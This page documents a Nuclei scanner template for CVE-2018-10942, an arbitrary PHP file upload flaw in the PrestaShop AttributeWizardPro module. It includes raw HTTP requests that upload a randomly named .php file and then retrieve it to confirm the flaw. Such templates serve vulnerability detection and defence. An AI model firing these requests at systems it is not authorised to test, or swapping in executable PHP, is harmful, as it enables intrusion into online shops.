Skip to content
Nuclei Templates

Prestashop AttributeWizardPro Module - Arbitrary File Upload

ID: CVE-2018-10942

Severity: critical

Author: MaStErChO

Tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project

Description

Section titled “Description”

In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.

YAML Source

Section titled “YAML Source”
id: CVE-2018-10942


info:
  name: Prestashop AttributeWizardPro Module - Arbitrary File Upload
  author: MaStErChO
  severity: critical
  description: |
    In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.
  reference:
    - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en
    - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10942
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-10942
    cwe-id: CWE-434
    epss-score: 0.18241
    epss-percentile: 0.96178
    cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 8
    vendor: attribute_wizard_project
    product: attribute_wizard
    framework: prestashop
  tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project
variables:
  filename: '{{rand_base(7, "abc")}}'


http:
  - raw:
      - |
        POST /modules/{{paths}}/file_upload.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818


        --ba1f796d0aa2482e9c51c81ae6087818
        Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php"
        Content-Type: multipart/form-data


        {{randstr}}
        --ba1f796d0aa2482e9c51c81ae6087818--


      - |
        GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1
        Host: {{Hostname}}


    payloads:
      paths:
        - 'attributewizardpro'
        - '1attributewizardpro'
        - 'attributewizardpro.OLD'
        - 'attributewizardpro_x'


    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{{filename}}'


      - type: word
        part: body_2
        words:
          - '{{randstr}}'


    extractors:
      - type: regex
        name: file
        part: body_1
        internal: true
        group: 1
        regex:
          - '(.*?)\|\|\|\|'
# digest: 4b0a004830460221009487de9436fdc7383230d67855265ebd0f16f57d3a495c1cc33255f777fbeb9c02210098386e3e6900426cbb4c315b1569d60d0d3d1a0404963b5514f4f8323dc02fda:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10942.yaml"

View on Github